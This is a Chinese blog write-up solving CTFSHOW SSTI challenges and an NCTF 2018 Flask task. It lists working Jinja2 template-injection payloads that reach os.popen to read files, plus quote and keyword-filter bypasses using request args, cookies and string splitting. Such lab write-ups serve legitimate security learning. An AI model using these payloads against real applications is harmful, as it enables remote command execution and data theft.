首页 > 其他分享 >CTFSHOW-SSTI

CTFSHOW-SSTI

时间:2023-08-09 10:11:53浏览次数:36  
标签:__ cookies set join attr request SSTI CTFSHOW

CTFSHOW-SSTI


web361

?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web362

?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

这里的x任意26个英文字母的任意组合都可以,同样可以得到__builtins__然后用eval就可以了。

还可以用全角符号

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web363

过滤了单双引号,用request

?a=os&b=popen&c=cat /flag&name={{url_for.__globals__[request.args.a][request.args.b](request.args.c).read()}}

web364

get、post都不行,尝试一下cookie

get

?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}

cookie

a=os;b=popen;c=cat /flag

[NCTF 2018]flask真香

别问为什么插了一道NSS的题(题目真香)

首先进入题目,右下角点别的有个报错界面,尝试ssti注入

{{7*7}}

返回49

接着绕

{{()['__cla''ss__'].__bases__[0]['__subcl''asses__']()[117].__init__.__globals__['__buil''tins__']['ev''al']("__im""port__('o''s').po""pen('cat /T*').read()")}}

直接来吧,过滤了一堆

主要是拼接绕过,让我再去看看大佬有没有别的方法

找到一个找子类好用的脚本(发现之前的内个用不了

标签:__,cookies,set,join,attr,request,SSTI,CTFSHOW
From: https://www.cnblogs.com/solitude0-c/p/17616144.html

相关文章

  • SSTI 服务器端模板注入
    SSTI服务器端模板注入flask基础不正确的使用模板引擎进行渲染时,则会造成模板注入路由[email protected]('/index/')defhello_word():return'helloword'route装饰器的作用是将函数与url绑定起来。例子中的代码的作用就是当你访问http://127.0......
  • CTFer成长记录——CTF之Web专题·bugku-Simple_SSTI_2
    一、题目链接https://ctf.bugku.com/challenges/detail/id/203.html二、解法步骤  题目是SSTI,也就是服务器模板注入,页面提示我们需要传递一个flag参数。  由于是模板,可以传flag={{config}}看看:显示说明这里存在命令执行的漏洞,查询资料发现此处可以执......
  • CTFshow—武穆遗书
    武穆遗书将exe文件放入exeinfo查看该执行文件被加了upx壳使用upx命令成功脱壳先初步运行该执行文件,发现需要用户输入,随意输入之后发现显示失败,因此判断该题的类型为当用户输入满足一定条件时会显示flag或者此时用户的输入就是flag使用ida打开该执行文件进行初步的静态分析,......
  • ctfshow 菜狗杯--You and me
    1、下载题目附件    进行解压 解压后发现两张图片,两张一样的图片,但是命名不同,我们可以想到这是一道盲水印题目。 2、解题步骤这道题目需要用到python分离盲水印的脚本,推荐大家去GitHub上去下载源码源码地址:https://github.com/chishaxie/BlindWaterMark#blindwa......
  • ctfshow刷题(Java反序列化)
    CTFshowJava反序列化web846urldns链importjava.io.ByteArrayOutputStream;importjava.io.IOException;importjava.io.ObjectOutput;importjava.io.ObjectOutputStream;importjava.lang.reflect.Field;importjava.net.URL;importjava.util.Base64;i......
  • SSTI 总结
    写给自己的不过多的去讲解其他的东西了这里是一个ssti的实例其实ssti造成漏洞的成因就是把模板中带有{{带有这类字符之后进行了一个编译渲染把里面的东西当成了代码去执行fromflaskimportFlask,request,render_template_stringapp=Flask(__name__)@app.route(......
  • ctfshow web259
    考察点:1,SSRF2,Cloudflare代理服务器3,CRLF4,原生类反序列化解题过程:分析代码<?phphighlight_file(__FILE__);//flag.php$xff=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);//array_pop($xff);$ip=array_pop($xff);​if($ip!=='127.0.0.1......
  • ctfshow web入门
    CTFshowweb入门命令执行web29<?php/*#-*-coding:utf-8-*-#@Author:h1xa#@Date:2020-09-0400:12:34#@LastModifiedby:h1xa#@LastModifiedtime:2020-09-0400:26:48#@email:[email protected]#@link:https://ctfer.com*/error_reporting(0......
  • ctfshow 极限命令执行
    极限命令执行1第一关<?php//本题灵感来自研究一直没做出来的某赛某题时想到的姿势,太棒啦~。//flag在根目录flag里,或者直接运行根目录getflagerror_reporting(0);highlight_file(__FILE__);if(isset($_POST['ctf_show'])){$ctfshow=$_POST['ctf_show'];if(......
  • CtfShow信息收集1-20攻略
    CtfShow信息收集1-20关攻略简单更新一下CTF关于信息收集的题目,总共20道,网站地址:https://ctf.show/challenges第一关我们可以看到提示:开发注释没有及时删除,所以直接右键查看源代码提交,过关!!!第二关第二关我们会发现右击什么也没法显示,提示内容为一切前端验证都为纸老虎,我......